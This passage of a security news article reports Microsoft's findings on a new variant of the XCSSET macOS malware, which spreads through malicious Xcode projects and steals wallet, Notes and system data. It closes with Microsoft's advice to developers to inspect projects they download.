According to Microsoft, the recent enhancements to this malware family expand its previously reported capabilities, which include targeting digital wallets, harvesting data from the Notes application, and extracting confidential system information and files. XCSSET comprises several modules designed to gather and transmit sensitive data from compromised devices.

The updated XCSSET variant is now detectable by Microsoft Defender for Endpoint on Mac, and it is anticipated that other malware detection solutions will soon follow suit. Unfortunately, Microsoft has not yet provided any file hashes or other indicators of compromise that users can utilize to determine if they have been affected. A representative from Microsoft indicated that these indicators will be shared in an upcoming blog entry.

To safeguard against new variants, Microsoft advises developers to thoroughly examine all Xcode projects that they download or clone from repositories, as sharing these projects is common practice among developers. XCSSET takes advantage of the inherent trust within the development community by spreading through malicious projects created by attackers.